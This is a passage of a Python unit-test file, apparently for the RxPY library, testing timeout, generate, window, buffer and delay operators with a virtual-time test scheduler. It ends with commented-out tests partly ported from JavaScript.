        on_next(240, 3), on_next(320, 4), on_next(410, 5), on_completed(500))
    src.subscriptions.assert_equal(subscribe(200, 500))
    other.subscriptions.assert_equal()
def test_timeout_datetime_offset_timeout_occurs():
    """Absolute 400ms deadline passes before the first value → fallback at 400."""
    sched = TestScheduler()
    src = sched.create_hot_observable(on_next(410, 1))
    other = sched.create_cold_observable(on_next(100, -1))
    res = sched.start(
        lambda: src.timeout(datetime.fromtimestamp(400 / 1000), other, scheduler=sched))
    res.messages.assert_equal(on_next(500, -1))
    src.subscriptions.assert_equal(subscribe(200, 400))
    other.subscriptions.assert_equal(subscribe(400, 1000))
def test_timeout_datetime_offset_timeout_does_not_occur_completed():
    """Completion at 390 beats the absolute 400ms deadline; no fallback."""
    sched = TestScheduler()
    src = sched.create_hot_observable(on_next(310, 1), on_completed(390))
    other = sched.create_cold_observable(on_next(100, -1))
    res = sched.start(
        lambda: src.timeout(datetime.fromtimestamp(400 / 1000), other, scheduler=sched))
    res.messages.assert_equal(on_next(310, 1), on_completed(390))
    src.subscriptions.assert_equal(subscribe(200, 390))
    other.subscriptions.assert_equal()
def test_timeout_datetime_offset_timeout_does_not_occur_error():
    """An error at 390 beats the absolute 400ms deadline; no fallback."""
    err = 'ex'
    sched = TestScheduler()
    src = sched.create_hot_observable(on_next(310, 1), on_error(390, err))
    other = sched.create_cold_observable(on_next(100, -1))
    res = sched.start(
        lambda: src.timeout(datetime.fromtimestamp(400 / 1000), other, scheduler=sched))
    res.messages.assert_equal(on_next(310, 1), on_error(390, err))
    src.subscriptions.assert_equal(subscribe(200, 390))
    other.subscriptions.assert_equal()
def test_timeout_datetime_offset_timeout_occur_2():
    """Values before the absolute deadline pass; at 400 control moves to the fallback."""
    sched = TestScheduler()
    src = sched.create_hot_observable(
        on_next(310, 1), on_next(350, 2), on_next(420, 3), on_completed(450))
    other = sched.create_cold_observable(on_next(100, -1))
    res = sched.start(
        lambda: src.timeout(datetime.fromtimestamp(400 / 1000), other, scheduler=sched))
    res.messages.assert_equal(on_next(310, 1), on_next(350, 2), on_next(500, -1))
    src.subscriptions.assert_equal(subscribe(200, 400))
    other.subscriptions.assert_equal(subscribe(400, 1000))
def test_timeout_datetime_offset_timeout_occur_3():
    """Same as occur_2 but with an empty fallback: nothing after the switch."""
    sched = TestScheduler()
    src = sched.create_hot_observable(
        on_next(310, 1), on_next(350, 2), on_next(420, 3), on_completed(450))
    other = sched.create_cold_observable()
    res = sched.start(
        lambda: src.timeout(datetime.fromtimestamp(400 / 1000), other, sched))
    res.messages.assert_equal(on_next(310, 1), on_next(350, 2))
    src.subscriptions.assert_equal(subscribe(200, 400))
    other.subscriptions.assert_equal(subscribe(400, 1000))
def test_timeout_duration_simple_never():
    """Per-value duration observables that never fire: the source passes through;
    the duration is re-subscribed after each value."""
    sched = TestScheduler()
    src = sched.create_hot_observable(
        on_next(310, 1), on_next(350, 2), on_next(420, 3), on_completed(450))
    dur = sched.create_cold_observable()
    res = sched.start(lambda: src.timeout_with_selector(dur, lambda x: dur))
    res.messages.assert_equal(
        on_next(310, 1), on_next(350, 2), on_next(420, 3), on_completed(450))
    src.subscriptions.assert_equal(subscribe(200, 450))
    dur.subscriptions.assert_equal(
        subscribe(200, 310), subscribe(310, 350), subscribe(350, 420),
        subscribe(420, 450))
def test_timeout_duration_simple_timeout_first():
    """The first-timeout observable fires at 300 before any value → error at 300."""
    sched = TestScheduler()
    src = sched.create_hot_observable(
        on_next(310, 1), on_next(350, 2), on_next(420, 3), on_completed(450))
    first = sched.create_cold_observable(on_next(100, 'boo!'))
    per_value = sched.create_cold_observable()
    res = sched.start(lambda: src.timeout_with_selector(first, lambda x: per_value))
    assert(len(res.messages) == 1)
    assert(res.messages[0].time == 300 and res.messages[0].value.exception)
    src.subscriptions.assert_equal(subscribe(200, 300))
    first.subscriptions.assert_equal(subscribe(200, 300))
    per_value.subscriptions.assert_equal()
def test_timeout_duration_simple_timeout_later():
    """The per-value duration (50 ticks) trips after 350+50=400 → error at 400."""
    sched = TestScheduler()
    src = sched.create_hot_observable(
        on_next(310, 1), on_next(350, 2), on_next(420, 3), on_completed(450))
    first = sched.create_cold_observable()
    per_value = sched.create_cold_observable(on_next(50, 'boo!'))
    res = sched.start(lambda: src.timeout_with_selector(first, lambda _: per_value))
    assert(len(res.messages) == 3)
    assert(on_next(310, 1).equals(res.messages[0]))
    assert(on_next(350, 2).equals(res.messages[1]))
    assert(res.messages[2].time == 400 and res.messages[2].value.exception)
    src.subscriptions.assert_equal(subscribe(200, 400))
    first.subscriptions.assert_equal(subscribe(200, 310))
    per_value.subscriptions.assert_equal(subscribe(310, 350), subscribe(350, 400))
def test_timeout_duration_simple_timeout_by_completion():
    """A per-value timeout observable that completes also triggers the timeout."""
    scheduler = TestScheduler()
    xs = scheduler.create_hot_observable(
        on_next(310, 1), on_next(350, 2), on_next(420, 3), on_completed(450))
    ys = scheduler.create_cold_observable()
    zs = scheduler.create_cold_observable(on_completed(50))

    def create():
        def selector(_):
            return zs
        return xs.timeout_with_selector(ys, selector)

    results = scheduler.start(create)
    assert(len(results.messages) == 3)
    assert(on_next(310, 1).equals(results.messages[0]))
    assert(on_next(350, 2).equals(results.messages[1]))
    # Completion of zs at 350 + 50 = 400 counts as a timeout.
    assert(results.messages[2].time == 400 and results.messages[2].value.exception)
    xs.subscriptions.assert_equal(subscribe(200, 400))
    ys.subscriptions.assert_equal(subscribe(200, 310))
    zs.subscriptions.assert_equal(subscribe(310, 350), subscribe(350, 400))
def test_timeout_duration_simple_selector_throws():
    """timeout_with_selector: an exception raised by the timeout-duration
    selector is forwarded to the observer as an on_error.

    Bug fix: this test was originally defined with the same name as the
    preceding test (test_timeout_duration_simple_timeout_by_completion),
    silently shadowing it so only one of the two ever ran. Renamed to
    describe what the body actually exercises (a throwing selector).
    """
    ex = 'ex'
    scheduler = TestScheduler()
    xs = scheduler.create_hot_observable(
        on_next(310, 1), on_next(350, 2), on_next(420, 3), on_completed(450))
    ys = scheduler.create_cold_observable()
    zs = scheduler.create_cold_observable()

    def create():
        def selector(x):
            # Selector throws for the third value (x == 3).
            if x < 3:
                return zs
            else:
                _raise(ex)
        return xs.timeout_with_selector(ys, selector)

    results = scheduler.start(create)
    results.messages.assert_equal(
        on_next(310, 1), on_next(350, 2), on_next(420, 3), on_error(420, ex))
    xs.subscriptions.assert_equal(subscribe(200, 420))
    ys.subscriptions.assert_equal(subscribe(200, 310))
    zs.subscriptions.assert_equal(subscribe(310, 350), subscribe(350, 420))
def test_timeout_duration_simple_inner_throws():
    """An on_error from a per-value timeout observable is forwarded as-is."""
    ex = 'ex'
    scheduler = TestScheduler()
    xs = scheduler.create_hot_observable(
        on_next(310, 1), on_next(350, 2), on_next(420, 3), on_completed(450))
    ys = scheduler.create_cold_observable()
    zs = scheduler.create_cold_observable(on_error(50, ex))

    def create():
        def selector(_):
            return zs
        return xs.timeout_with_selector(ys, selector)

    results = scheduler.start(create)
    results.messages.assert_equal(
        on_next(310, 1), on_next(350, 2), on_error(400, ex))
    xs.subscriptions.assert_equal(subscribe(200, 400))
    ys.subscriptions.assert_equal(subscribe(200, 310))
    zs.subscriptions.assert_equal(subscribe(310, 350), subscribe(350, 400))
def test_timeout_duration_simple_first_throws():
    """An on_error from the subscription-time timeout observable is forwarded."""
    ex = 'ex'
    scheduler = TestScheduler()
    xs = scheduler.create_hot_observable(
        on_next(310, 1), on_next(350, 2), on_next(420, 3), on_completed(450))
    ys = scheduler.create_cold_observable(on_error(50, ex))
    zs = scheduler.create_cold_observable()

    def create():
        def selector(_):
            return zs
        return xs.timeout_with_selector(ys, selector)

    results = scheduler.start(create)
    # ys errors at 200 + 50 = 250, before any source value.
    results.messages.assert_equal(on_error(250, ex))
    xs.subscriptions.assert_equal(subscribe(200, 250))
    ys.subscriptions.assert_equal(subscribe(200, 250))
    zs.subscriptions.assert_equal()
def test_timeout_duration_simple_source_throws():
    """A source error passes straight through an un-triggered timeout."""
    ex = 'ex'
    scheduler = TestScheduler()
    xs = scheduler.create_hot_observable(
        on_next(310, 1), on_next(350, 2), on_next(420, 3), on_error(450, ex))
    ys = scheduler.create_cold_observable()
    zs = scheduler.create_cold_observable()

    def create():
        def selector(_):
            return zs
        return xs.timeout_with_selector(ys, selector)

    results = scheduler.start(create)
    results.messages.assert_equal(
        on_next(310, 1), on_next(350, 2), on_next(420, 3), on_error(450, ex))
    xs.subscriptions.assert_equal(subscribe(200, 450))
    ys.subscriptions.assert_equal(subscribe(200, 310))
    zs.subscriptions.assert_equal(
        subscribe(310, 350), subscribe(350, 420), subscribe(420, 450))
def test_generate_timespan_finite():
    """generate_with_relative_time emits 0..3 at cumulative relative times."""
    scheduler = TestScheduler()

    def create():
        return Observable.generate_with_relative_time(
            0,
            lambda state: state <= 3,
            lambda state: state + 1,
            lambda state: state,
            lambda state: state + 1,
            scheduler=scheduler)

    results = scheduler.start(create)
    results.messages.assert_equal(
        on_next(202, 0), on_next(204, 1), on_next(207, 2), on_next(211, 3),
        on_completed(211))
def test_generate_timespan_throw_condition():
    """A throwing condition function surfaces as an immediate on_error."""
    ex = 'ex'
    scheduler = TestScheduler()

    def create():
        return Observable.generate_with_relative_time(
            0,
            lambda state: _raise(ex),
            lambda state: state + 1,
            lambda state: state,
            lambda state: state + 1,
            scheduler=scheduler)

    results = scheduler.start(create)
    results.messages.assert_equal(on_error(201, ex))
def test_generate_timespan_throw_result_selector():
    """A throwing result selector surfaces as an immediate on_error."""
    ex = 'ex'
    scheduler = TestScheduler()

    def create():
        return Observable.generate_with_relative_time(
            0,
            lambda state: True,
            lambda state: state + 1,
            lambda state: _raise(ex),
            lambda state: state + 1,
            scheduler=scheduler)

    results = scheduler.start(create)
    results.messages.assert_equal(on_error(201, ex))
def test_generate_timespan_throw_iterate():
    """A throwing iterate function errors after the first value is emitted."""
    ex = 'ex'
    scheduler = TestScheduler()

    def create():
        return Observable.generate_with_relative_time(
            0,
            lambda state: True,
            lambda state: _raise(ex),
            lambda state: state,
            lambda state: state + 1,
            scheduler=scheduler)

    results = scheduler.start(create)
    results.messages.assert_equal(on_next(202, 0), on_error(202, ex))
def test_generate_timespan_throw_timeselector():
    """A throwing time selector surfaces as an immediate on_error."""
    ex = 'ex'
    scheduler = TestScheduler()

    def create():
        return Observable.generate_with_relative_time(
            0,
            lambda state: True,
            lambda state: state + 1,
            lambda state: state,
            lambda state: _raise(ex),
            scheduler=scheduler)

    results = scheduler.start(create)
    results.messages.assert_equal(on_error(201, ex))
def test_generate_timespan_dispose():
    """Disposing the subscription stops generation mid-sequence.

    Consistency fix: renamed from test_generate_timespan_Dispose — every
    other test in this module uses all-lowercase snake_case.
    """
    scheduler = TestScheduler()

    def create():
        return Observable.generate_with_relative_time(
            0,
            lambda x: True,
            lambda x: x + 1,
            lambda x: x,
            lambda x: x + 1,
            scheduler=scheduler)

    # Dispose at 210: values scheduled for 202/204/207 made it out.
    results = scheduler.start(create, disposed=210)
    results.messages.assert_equal(on_next(202, 0), on_next(204, 1), on_next(207, 2))
def test_generate_datetime_offset_finite():
    """generate_with_relative_time, datetime-offset variant: finite sequence.

    Bug fix: the original body `return`-ed the observable directly from the
    test function (no inner create()), so scheduler.start and every
    assertion below were unreachable dead code. Restored the standard
    create() pattern used by the sibling tests. The condition is also fixed
    from `lambda x: True` to `lambda x: x <= 3`, since the expected
    messages end with on_completed(211) (matching the timespan twin).

    NOTE(review): the time selector adds scheduler.now() — presumably this
    test was meant for an absolute-time generate variant; verify the
    expected tick times against the operator's actual time interpretation.
    """
    scheduler = TestScheduler()

    def create():
        return Observable.generate_with_relative_time(
            0,
            lambda x: x <= 3,
            lambda x: x + 1,
            lambda x: x,
            lambda x: scheduler.now() + x + 1,
            scheduler=scheduler)

    results = scheduler.start(create)
    results.messages.assert_equal(
        on_next(202, 0), on_next(204, 1), on_next(207, 2), on_next(211, 3),
        on_completed(211))
def test_generate_datetime_offset_throw_condition():
    """Datetime-offset generate: a throwing condition yields on_error(201).

    Bug fix: the original body `return`-ed the observable directly from the
    test function (no inner create()), leaving scheduler.start and the
    assertion as unreachable dead code. Restored the create() pattern.
    """
    ex = 'ex'
    scheduler = TestScheduler()

    def create():
        return Observable.generate_with_relative_time(
            0,
            lambda x: _raise(ex),
            lambda x: x + 1,
            lambda x: x,
            lambda x: scheduler.now() + x + 1,
            scheduler=scheduler)

    results = scheduler.start(create)
    results.messages.assert_equal(on_error(201, ex))
def test_generate_datetime_offset_throw_result_selector():
    """Datetime-offset generate: a throwing result selector yields on_error(201).

    Bug fix: the original body `return`-ed the observable directly from the
    test function (no inner create()), leaving scheduler.start and the
    assertion as unreachable dead code. Restored the create() pattern.
    """
    ex = 'ex'
    scheduler = TestScheduler()

    def create():
        return Observable.generate_with_relative_time(
            0,
            lambda x: True,
            lambda x: x + 1,
            lambda x: _raise(ex),
            lambda x: scheduler.now() + x + 1,
            scheduler=scheduler)

    results = scheduler.start(create)
    results.messages.assert_equal(on_error(201, ex))
def test_generate_datetime_offset_throw_iterate():
    """Datetime-offset generate: a throwing iterate errors after one value.

    Bug fix: the original body `return`-ed the observable directly from the
    test function (no inner create()), leaving scheduler.start and the
    assertion as unreachable dead code. Restored the create() pattern.
    """
    ex = 'ex'
    scheduler = TestScheduler()

    def create():
        return Observable.generate_with_relative_time(
            0,
            lambda x: True,
            lambda x: _raise(ex),
            lambda x: x,
            lambda x: scheduler.now() + x + 1,
            scheduler=scheduler)

    results = scheduler.start(create)
    results.messages.assert_equal(on_next(202, 0), on_error(202, ex))
def test_generate_datetime_offset_throw_time_selector():
    """Datetime-offset generate: a throwing time selector yields on_error(201).

    Bug fixes: (1) the original body `return`-ed the observable directly
    from the test function (no inner create()), leaving everything after
    unreachable; (2) the `results = scheduler.start(create)` line was
    missing entirely, so the assertion referenced an undefined name.
    """
    ex = 'ex'
    scheduler = TestScheduler()

    def create():
        return Observable.generate_with_relative_time(
            0,
            lambda x: True,
            lambda x: x + 1,
            lambda x: x,
            lambda x: _raise(ex),
            scheduler=scheduler)

    results = scheduler.start(create)
    results.messages.assert_equal(on_error(201, ex))
def test_generate_datetime_offset_dispose():
    """Datetime-offset generate: disposal at 210 truncates the sequence.

    Bug fix: the original body `return`-ed the observable directly from the
    test function (no inner create()), leaving scheduler.start and the
    assertion as unreachable dead code. Restored the create() pattern.
    """
    scheduler = TestScheduler()

    def create():
        return Observable.generate_with_relative_time(
            0,
            lambda x: True,
            lambda x: x + 1,
            lambda x: x,
            lambda x: scheduler.now() + x + 1,
            scheduler=scheduler)

    results = scheduler.start(create, disposed=210)
    results.messages.assert_equal(on_next(202, 0), on_next(204, 1), on_next(207, 2))
def test_window_with_time_basic():
    """window_with_time(100, 70): overlapping windows tagged with their index."""
    scheduler = TestScheduler()
    xs = scheduler.create_hot_observable(
        on_next(100, 1), on_next(210, 2), on_next(240, 3), on_next(280, 4),
        on_next(320, 5), on_next(350, 6), on_next(380, 7), on_next(420, 8),
        on_next(470, 9), on_completed(600))

    def create():
        def tag(window, idx):
            # Prefix each value with the index of its window.
            return window.select(lambda value: "%s %s" % (idx, value))
        return xs.window_with_time(100, 70, scheduler=scheduler).select(tag).merge_observable()

    results = scheduler.start(create)
    results.messages.assert_equal(
        on_next(210, "0 2"), on_next(240, "0 3"), on_next(280, "0 4"),
        on_next(280, "1 4"), on_next(320, "1 5"), on_next(350, "1 6"),
        on_next(350, "2 6"), on_next(380, "2 7"), on_next(420, "2 8"),
        on_next(420, "3 8"), on_next(470, "3 9"), on_completed(600))
    xs.subscriptions.assert_equal(subscribe(200, 600))
def test_window_with_time_error():
    """window_with_time: a source error propagates through the merged windows."""
    ex = 'ex'
    scheduler = TestScheduler()
    xs = scheduler.create_hot_observable(
        on_next(100, 1), on_next(210, 2), on_next(240, 3), on_next(280, 4),
        on_next(320, 5), on_next(350, 6), on_next(380, 7), on_next(420, 8),
        on_next(470, 9), on_error(600, ex))

    def create():
        def tag(window, idx):
            return window.select(lambda value: "%s %s" % (idx, value))
        return xs.window_with_time(100, 70, scheduler=scheduler).select(tag).merge_observable()

    results = scheduler.start(create)
    results.messages.assert_equal(
        on_next(210, "0 2"), on_next(240, "0 3"), on_next(280, "0 4"),
        on_next(280, "1 4"), on_next(320, "1 5"), on_next(350, "1 6"),
        on_next(350, "2 6"), on_next(380, "2 7"), on_next(420, "2 8"),
        on_next(420, "3 8"), on_next(470, "3 9"), on_error(600, ex))
    xs.subscriptions.assert_equal(subscribe(200, 600))
def test_window_with_time_disposed():
    """window_with_time: disposal at 370 truncates the windowed output.

    Consistency fix: renamed from test_Window_with_time_disposed — every
    other test in this module uses all-lowercase snake_case.
    """
    scheduler = TestScheduler()
    xs = scheduler.create_hot_observable(
        on_next(100, 1), on_next(210, 2), on_next(240, 3), on_next(280, 4),
        on_next(320, 5), on_next(350, 6), on_next(380, 7), on_next(420, 8),
        on_next(470, 9), on_completed(600))

    def create():
        def selector(w, i):
            return w.select(lambda x: "%s %s" % (i, x))
        return xs.window_with_time(100, 70, scheduler=scheduler).select(selector).merge_observable()

    results = scheduler.start(create, disposed=370)
    results.messages.assert_equal(
        on_next(210, "0 2"), on_next(240, "0 3"), on_next(280, "0 4"),
        on_next(280, "1 4"), on_next(320, "1 5"), on_next(350, "1 6"),
        on_next(350, "2 6"))
    xs.subscriptions.assert_equal(subscribe(200, 370))
def test_window_with_time_basic_same():
    """window_with_time with a single argument: tumbling (non-overlapping) windows."""
    scheduler = TestScheduler()
    xs = scheduler.create_hot_observable(
        on_next(100, 1), on_next(210, 2), on_next(240, 3), on_next(280, 4),
        on_next(320, 5), on_next(350, 6), on_next(380, 7), on_next(420, 8),
        on_next(470, 9), on_completed(600))

    def create():
        def tag(window, idx):
            return window.select(lambda value: "%s %s" % (idx, value))
        return xs.window_with_time(100, scheduler=scheduler).select(tag).merge_observable()

    results = scheduler.start(create)
    results.messages.assert_equal(
        on_next(210, "0 2"), on_next(240, "0 3"), on_next(280, "0 4"),
        on_next(320, "1 5"), on_next(350, "1 6"), on_next(380, "1 7"),
        on_next(420, "2 8"), on_next(470, "2 9"), on_completed(600))
    xs.subscriptions.assert_equal(subscribe(200, 600))
def test_buffer_with_time_basic():
    """buffer_with_time(100, 70): overlapping buffers rendered as CSV strings."""
    scheduler = TestScheduler()
    xs = scheduler.create_hot_observable(
        on_next(100, 1), on_next(210, 2), on_next(240, 3), on_next(280, 4),
        on_next(320, 5), on_next(350, 6), on_next(380, 7), on_next(420, 8),
        on_next(470, 9), on_completed(600))

    def create():
        def render(buf):
            return ",".join(str(item) for item in buf)
        return xs.buffer_with_time(100, 70, scheduler=scheduler).select(render)

    results = scheduler.start(create)
    results.messages.assert_equal(
        on_next(300, "2,3,4"), on_next(370, "4,5,6"), on_next(440, "6,7,8"),
        on_next(510, "8,9"), on_next(580, ""), on_next(600, ""),
        on_completed(600))
    xs.subscriptions.assert_equal(subscribe(200, 600))
def test_buffer_with_time_error():
    """buffer_with_time: a source error propagates past the buffered values."""
    ex = 'ex'
    scheduler = TestScheduler()
    xs = scheduler.create_hot_observable(
        on_next(100, 1), on_next(210, 2), on_next(240, 3), on_next(280, 4),
        on_next(320, 5), on_next(350, 6), on_next(380, 7), on_next(420, 8),
        on_next(470, 9), on_error(600, ex))

    def create():
        def render(buf):
            return ",".join(str(item) for item in buf)
        return xs.buffer_with_time(100, 70, scheduler=scheduler).select(render)

    results = scheduler.start(create)
    results.messages.assert_equal(
        on_next(300, "2,3,4"), on_next(370, "4,5,6"), on_next(440, "6,7,8"),
        on_next(510, "8,9"), on_next(580, ""), on_error(600, ex))
    xs.subscriptions.assert_equal(subscribe(200, 600))
def test_buffer_with_time_disposed():
    """buffer_with_time: disposal at 370 leaves only the first full buffer."""
    scheduler = TestScheduler()
    xs = scheduler.create_hot_observable(
        on_next(100, 1), on_next(210, 2), on_next(240, 3), on_next(280, 4),
        on_next(320, 5), on_next(350, 6), on_next(380, 7), on_next(420, 8),
        on_next(470, 9), on_completed(600))

    def create():
        def render(buf):
            return ",".join(str(item) for item in buf)
        return xs.buffer_with_time(100, 70, scheduler=scheduler).select(render)

    results = scheduler.start(create, disposed=370)
    results.messages.assert_equal(on_next(300, "2,3,4"))
    xs.subscriptions.assert_equal(subscribe(200, 370))
def test_buffer_with_time_basic_same():
    """buffer_with_time with a single argument: tumbling (non-overlapping) buffers."""
    scheduler = TestScheduler()
    xs = scheduler.create_hot_observable(
        on_next(100, 1), on_next(210, 2), on_next(240, 3), on_next(280, 4),
        on_next(320, 5), on_next(350, 6), on_next(380, 7), on_next(420, 8),
        on_next(470, 9), on_completed(600))

    def create():
        def render(buf):
            return ",".join(str(item) for item in buf)
        return xs.buffer_with_time(100, scheduler=scheduler).select(render)

    results = scheduler.start(create)
    results.messages.assert_equal(
        on_next(300, "2,3,4"), on_next(400, "5,6,7"), on_next(500, "8,9"),
        on_next(600, ""), on_completed(600))
    xs.subscriptions.assert_equal(subscribe(200, 600))
# Delay with selector
def test_delay_duration_simple1():
    """delay_with_selector: each value is delayed by its own value's amount."""
    scheduler = TestScheduler()
    xs = scheduler.create_hot_observable(
        on_next(150, 1), on_next(210, 10), on_next(220, 30), on_next(230, 50),
        on_next(240, 35), on_next(250, 20), on_completed(260))

    def create():
        # Each value x becomes its own delay: a cold observable firing at +x.
        return xs.delay_with_selector(
            lambda x: scheduler.create_cold_observable(on_next(x, '!')))

    results = scheduler.start(create)
    results.messages.assert_equal(
        on_next(210 + 10, 10), on_next(220 + 30, 30), on_next(250 + 20, 20),
        on_next(240 + 35, 35), on_next(230 + 50, 50), on_completed(280))
    xs.subscriptions.assert_equal(subscribe(200, 260))
def test_delay_duration_simple2():
    """delay_with_selector: a shared 10-tick duration shifts every value by 10."""
    scheduler = TestScheduler()
    xs = scheduler.create_hot_observable(
        on_next(150, 1), on_next(210, 2), on_next(220, 3), on_next(230, 4),
        on_next(240, 5), on_next(250, 6), on_completed(300))
    ys = scheduler.create_cold_observable(on_next(10, '!'))

    def create():
        def duration(_):
            return ys
        return xs.delay_with_selector(duration)

    results = scheduler.start(create)
    results.messages.assert_equal(
        on_next(210 + 10, 2), on_next(220 + 10, 3), on_next(230 + 10, 4),
        on_next(240 + 10, 5), on_next(250 + 10, 6), on_completed(300))
    xs.subscriptions.assert_equal(subscribe(200, 300))
    ys.subscriptions.assert_equal(
        subscribe(210, 220), subscribe(220, 230), subscribe(230, 240),
        subscribe(240, 250), subscribe(250, 260))
def test_delay_duration_simple3():
    """delay_with_selector: a 100-tick duration delays completion past the source's end."""
    scheduler = TestScheduler()
    xs = scheduler.create_hot_observable(
        on_next(150, 1), on_next(210, 2), on_next(220, 3), on_next(230, 4),
        on_next(240, 5), on_next(250, 6), on_completed(300))
    ys = scheduler.create_cold_observable(on_next(100, '!'))

    def create():
        def duration(_):
            return ys
        return xs.delay_with_selector(duration)

    results = scheduler.start(create)
    results.messages.assert_equal(
        on_next(210 + 100, 2), on_next(220 + 100, 3), on_next(230 + 100, 4),
        on_next(240 + 100, 5), on_next(250 + 100, 6), on_completed(350))
    xs.subscriptions.assert_equal(subscribe(200, 300))
    ys.subscriptions.assert_equal(
        subscribe(210, 310), subscribe(220, 320), subscribe(230, 330),
        subscribe(240, 340), subscribe(250, 350))
def test_delay_duration_simple4_inner_empty():
    """delay_with_selector: a duration that only completes still releases values."""
    scheduler = TestScheduler()
    xs = scheduler.create_hot_observable(
        on_next(150, 1), on_next(210, 2), on_next(220, 3), on_next(230, 4),
        on_next(240, 5), on_next(250, 6), on_completed(300))
    ys = scheduler.create_cold_observable(on_completed(100))

    def create():
        def duration(_):
            return ys
        return xs.delay_with_selector(duration)

    results = scheduler.start(create)
    results.messages.assert_equal(
        on_next(210 + 100, 2), on_next(220 + 100, 3), on_next(230 + 100, 4),
        on_next(240 + 100, 5), on_next(250 + 100, 6), on_completed(350))
    xs.subscriptions.assert_equal(subscribe(200, 300))
    ys.subscriptions.assert_equal(
        subscribe(210, 310), subscribe(220, 320), subscribe(230, 330),
        subscribe(240, 340), subscribe(250, 350))
def test_delay_duration_dispose1():
    """delay_with_selector: disposal at 425 cuts off pending delayed values."""
    scheduler = TestScheduler()
    xs = scheduler.create_hot_observable(
        on_next(150, 1), on_next(210, 2), on_next(220, 3), on_next(230, 4),
        on_next(240, 5), on_next(250, 6), on_completed(300))
    ys = scheduler.create_cold_observable(on_next(200, '!'))

    def create():
        def duration(_):
            return ys
        return xs.delay_with_selector(duration)

    results = scheduler.start(create, disposed=425)
    results.messages.assert_equal(on_next(210 + 200, 2), on_next(220 + 200, 3))
    xs.subscriptions.assert_equal(subscribe(200, 300))
    ys.subscriptions.assert_equal(
        subscribe(210, 410), subscribe(220, 420), subscribe(230, 425),
        subscribe(240, 425), subscribe(250, 425))
def test_delay_duration_dispose2():
    """delay_with_selector: disposal at 300 ends an in-flight duration early."""
    scheduler = TestScheduler()
    xs = scheduler.create_hot_observable(
        on_next(150, 1), on_next(210, 2), on_next(400, 3), on_completed(500))
    ys = scheduler.create_cold_observable(on_next(50, '!'))

    def create():
        def duration(_):
            return ys
        return xs.delay_with_selector(duration)

    results = scheduler.start(create, disposed=300)
    results.messages.assert_equal(on_next(210 + 50, 2))
    xs.subscriptions.assert_equal(subscribe(200, 300))
    ys.subscriptions.assert_equal(subscribe(210, 260))
# // TakeLastBuffer
# def test_takeLastBuffer_with_time_Zero1():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_completed(230))
# res = scheduler.start(create)
# return xs.takeLastBuffer_with_time(0, scheduler)
# res.messages.assert_equal(on_next(230, function (lst) {
# return lst.length === 0
# }), on_completed(230))
# xs.subscriptions.assert_equal(subscribe(200, 230))
# def test_takeLastBuffer_with_time_Zero2():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_next(230, 3), on_completed(230))
# res = scheduler.start(create)
# return xs.takeLastBuffer_with_time(0, scheduler)
# res.messages.assert_equal(on_next(230, function (lst) {
# return lst.length === 0
# }), on_completed(230))
# xs.subscriptions.assert_equal(subscribe(200, 230))
# function arrayEqual(arr1, arr2) {
# if (arr1.length != arr2.length) return false
# for (var i = 0, len = arr1.length i < len i++) {
# if (arr1[i] != arr2[i]) return false
# }
# return true
# }
# def test_takeLastBuffer_with_time_Some1():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_next(230, 3), on_completed(240))
# res = scheduler.start(create)
# return xs.takeLastBuffer_with_time(25, scheduler)
# res.messages.assert_equal(on_next(240, function (lst) {
# return arrayEqual(lst, [2, 3])
# }), on_completed(240))
# xs.subscriptions.assert_equal(subscribe(200, 240))
# def test_takeLastBuffer_with_time_Some2():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_next(230, 3), on_completed(300))
# res = scheduler.start(create)
# return xs.takeLastBuffer_with_time(25, scheduler)
# res.messages.assert_equal(on_next(300, function (lst) {
# return lst.length === 0
# }), on_completed(300))
# xs.subscriptions.assert_equal(subscribe(200, 300))
# def test_takeLastBuffer_with_time_Some3():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_next(230, 3), on_next(240, 4), on_next(250, 5), on_next(260, 6), on_next(270, 7), on_next(280, 8), on_next(290, 9), on_completed(300))
# res = scheduler.start(create)
# return xs.takeLastBuffer_with_time(45, scheduler)
# res.messages.assert_equal(on_next(300, function (lst) {
# return arrayEqual(lst, [6, 7, 8, 9])
# }), on_completed(300))
# xs.subscriptions.assert_equal(subscribe(200, 300))
# def test_takeLastBuffer_with_time_Some4():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(240, 2), on_next(250, 3), on_next(280, 4), on_next(290, 5), on_next(300, 6), on_completed(350))
# res = scheduler.start(create)
# return xs.takeLastBuffer_with_time(25, scheduler)
# res.messages.assert_equal(on_next(350, function (lst) {
# return lst.length === 0
# }), on_completed(350))
# xs.subscriptions.assert_equal(subscribe(200, 350))
# def test_takeLastBuffer_with_time_All():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_completed(230))
# res = scheduler.start(create)
# return xs.takeLastBuffer_with_time(50, scheduler)
# res.messages.assert_equal(on_next(230, function (lst) {
# return arrayEqual(lst, [1, 2])
# }), on_completed(230))
# xs.subscriptions.assert_equal(subscribe(200, 230))
# def test_takeLastBuffer_with_time_Error():
# var ex, res, scheduler, xs
# scheduler = TestScheduler()
# ex = 'ex'
# xs = scheduler.create_hot_observable(on_error(210, ex))
# res = scheduler.start(create)
# return xs.takeLastBuffer_with_time(50, scheduler)
# res.messages.assert_equal(on_error(210, ex))
# xs.subscriptions.assert_equal(subscribe(200, 210))
# def test_takeLastBuffer_with_time_Never():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable()
# res = scheduler.start(create)
# return xs.takeLastBuffer_with_time(50, scheduler)
# res.messages.assert_equal()
# xs.subscriptions.assert_equal(subscribe(200, 1000))
# def test_Take_Zero():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_completed(230))
# res = scheduler.start(create)
# return xs.takeWithTime(0, scheduler)
# res.messages.assert_equal(on_completed(201))
# xs.subscriptions.assert_equal(subscribe(200, 201))
# def test_Take_Some():
# var res, scheduler, xs
# scheduler = TestScheduler()
